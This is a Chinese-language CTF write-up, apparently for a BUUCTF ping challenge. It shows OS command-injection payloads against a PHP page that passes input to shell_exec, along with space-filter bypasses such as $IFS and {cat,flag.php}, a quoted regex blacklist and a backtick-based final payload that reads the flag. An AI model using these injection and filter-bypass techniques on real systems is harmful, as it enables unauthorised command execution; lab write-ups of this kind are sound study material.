进入界面
根据提示进行ping信号
看到网页的内容就想到经典的Linux命令执行,使用命令执行的管道符 " | "尝试列出文件
FLAG应该在Flag.php里面
构造playload进行提取
http://3747c9d4-f879-4d08-8c70-eaf4963f4e8c.node3.buuoj.cn/?ip=110.242.68.3|cat flag.php
提示:“/?ip= fxck your space!”,space暗示我们存在空格过滤,尝试构造语句来绕过空格
$IFS
${IFS}
$IFS$1 // $1改成$加其他数字貌似都行
<
<>
{cat,flag.php} // 用逗号实现了空格功能
%20
%09
出现新的提示“/?ip= 1fxck your symbol!”
说明仍然存在“flag”过滤,联想之前做的BUU题目,提示应该藏在另外一个php文件(index.php)里面,于是利用上面的绕过空格来构造Playload进行查看index.php
http://3747c9d4-f879-4d08-8c70-eaf4963f4e8c.node3.buuoj.cn/?ip=110.242.68.3|cat${IFS}index.php
经行php代码审计
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); //preg_math函数过滤掉的字符
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){ //同上
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){ //同上
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "
";
print_r($a);
}
?>
内联输出:使用反引号 ``代替 |,经反引号的输出命令转换为输出
构造playload
http://3747c9d4-f879-4d08-8c70-eaf4963f4e8c.node3.buuoj.cn/?ip=110.242.68.3;cat$IFS$9%60ls%60
得到flag
flag = "flag{1fe19100-c980-45f2-9625-262cbd69f6fa}"